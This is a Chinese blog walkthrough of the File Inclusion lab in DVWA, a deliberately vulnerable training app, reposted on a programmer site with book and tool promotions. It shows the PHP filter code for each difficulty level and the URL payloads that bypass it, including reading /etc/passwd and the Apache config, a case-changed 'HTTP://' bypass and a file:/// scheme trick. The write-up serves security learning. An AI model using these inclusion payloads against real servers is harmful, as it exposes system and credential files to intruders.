DVWA 黑客攻防演练（四）文件包含 File Inclusion

栏目: 服务器 · Apache · 发布时间: 6年前

内容简介：文件包含（file Inclusion）是一种很常见的攻击方式，主要是通过修改请求中变量从而访问了用户不应该访问的文件。还可以通过这个漏洞加载不属于本网站的文件等。下面一起来看看 DVWA 中的文件包含漏洞。原本也不知道是什么意思，然后尝试点击一下 File1 就显示 File1 的内容了。而且发现 url 变成了 http://192.168.31.166:5678/vulnerabilities/fi/?page=file1.phpHacker 就在浏览器中输入了 http://192.168.31.1

文件包含（file Inclusion）是一种很常见的攻击方式，主要是通过修改请求中变量从而访问了用户不应该访问的文件。还可以通过这个漏洞加载不属于本网站的文件等。下面一起来看看 DVWA 中的文件包含漏洞。

低级

原本也不知道是什么意思，然后尝试点击一下 File1 就显示 File1 的内容了。而且发现 url 变成了 http://192.168.31.166:5678/vulnerabilities/fi/?page=file1.php

Hacker 就在浏览器中输入了 http://192.168.31.166:5678/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

代码如下

<?php
// The page we wish to display 
$file = $_GET['page'];
?>

觉得主要问题还是对文件路径没有验证，还能这样玩

输入 /etc/passwd 能看到服务器的用户信息的
url 是 http://192.168.0.110:5678/vulnerabilities/fi/?page=http://www.baidu.com 直接显示百度主页

中级

<?php
// The page we wish to display
$file = $_GET['page'];
// Input validation
$file = str_replace(array("http://", "https://"), "", $file);
$file = str_replace(array("../", "..\""), "", $file);
?>

中级代码针对上面两种情况会有所改善， 但问题依然存在 比如输入的是http://192.168.0.110:5678/vulnerabilities/fi/?page=HTTP://www.baidu.com 比如输入的是全路径 http://192.168.0.110:5678/vulnerabilities/fi/?page=/etc/apache2/apache2.conf

高级

高级代码终于有输入验证了，只有文件名是有 file 开头的文件才能打开

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// 输入验证
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}

?>

好像也没什么问题了, http://192.168.0.110:5678/vulnerabilities/fi/?page=/etc/apache2/apache2.conf 之类的也打不开了。

此时 Hacker 输入了 http://192.168.0.110:5678/vulnerabilities/fi/?page=file:///etc/apache2/apache2.conf 就完美绕过

或者输入了 http://192.168.31.166:5678/vulnerabilities/fi/?page=file4.php，就中奖了。

DVWA上根本没有列出此文件！这是个隐藏文件来的，这而这代码的漏洞就是能显示隐藏的文件！这与需求不符。

不可能

再看看不可能的代码

<?php

// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>

感觉有点滑稽。哈哈哈哈这里的文件列表应该从读文件或者读数据库的方式获取比较好吧。这样不够优雅。

以上所述就是小编给大家介绍的《DVWA 黑客攻防演练（四）文件包含 File Inclusion》，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对码农网的支持！

查看所有标签

猜你喜欢:

本站部分资源来源于网络，本站转载出于传递更多信息之目的，版权归原作者或者来源机构所有，如转载稿涉及版权问题，请联系我们。

码农书籍

乔纳森传

利恩德·卡尼 / 汪琪岳卉王文雅 / 中信出版社 / 2014-1-1 / 49

抛开苹果公司，单就设计行业来讲，乔纳森也是一个特殊的人物。他推动了设计行业的大变革：不再为产品增加看起来炫得多的配件，而是要去掉多余的东西。 ——陈向东终于有一本书能够如此地接地气：它不再关注那位神一样的乔布斯，而是关注那位站在神的背后，同样具有神一样光环的乔纳森。 ——孙陶然乔纳森•艾夫把他自己对科学、人文、艺术，乃至整个世界的感知尽数渗透进苹果的设计和审美之中，他是......一起来看看《乔纳森传》这本书的介绍吧!

码农工具

DVWA 黑客攻防演练（四）文件包含 File Inclusion

低级

中级

高级

不可能

乔纳森传

URL 编码/解码

Markdown 在线编辑器

RGB CMYK 转换工具